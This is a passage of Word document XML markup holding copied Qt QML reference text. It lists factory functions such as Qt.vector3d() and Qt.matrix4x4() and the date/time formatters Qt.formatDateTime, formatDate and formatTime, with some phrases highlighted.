          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1541" w:anchor="font-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.font()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>vector2d</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1542" w:anchor="vector2d-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.vector2d()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>vector3d</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1543" w:anchor="vector3d-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.vector3d()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>vector4d</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1544" w:anchor="vector4d-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.vector4d()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>quaternion</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1545" w:anchor="quaternion-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.quaternion()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>matrix4x4</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- use</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1546" w:anchor="matrix4x4-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>Qt.matrix4x4()</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There are also </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string based constructors for these types</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1547" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1273" w:name="date-time-formatters"/>
      <w:bookmarkStart w:id="1274" w:name="_Toc483000797"/>
      <w:bookmarkStart w:id="1275" w:name="_Toc483003795"/>
      <w:bookmarkStart w:id="1276" w:name="_Toc483604149"/>
      <w:bookmarkStart w:id="1277" w:name="_Toc483605369"/>
      <w:bookmarkEnd w:id="1273"/>
      <w:r w:rsidRPr="00BE3BBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date/Time Formatters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1274"/>
      <w:bookmarkEnd w:id="1275"/>
      <w:bookmarkEnd w:id="1276"/>
      <w:bookmarkEnd w:id="1277"/>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The Qt object contains several functions for </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>formatting</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1548" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QDateTime</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1549" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QDate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1550" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QTime</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1551" w:anchor="formatDateTime-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>string Qt.formatDateTime(datetime date, variant format)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1552" w:anchor="formatDate-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>string Qt.formatDate(datetime date, variant format)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1553" w:anchor="formatTime-method" w:history="1">
        <w:r w:rsidR="008C71BA" w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>string Qt.formatTime(datetime date, variant format)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="008C71BA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The format specification is described at</w:t>
      </w:r>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1554" w:anchor="formatDateTime-method" w:history="1">
        <w:r w:rsidRPr="008C71BA">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt.formatDateTime</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008C71BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C71BA" w:rsidRPr="008C71BA" w:rsidRDefault="008C71BA" w:rsidP="00BE3BBD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
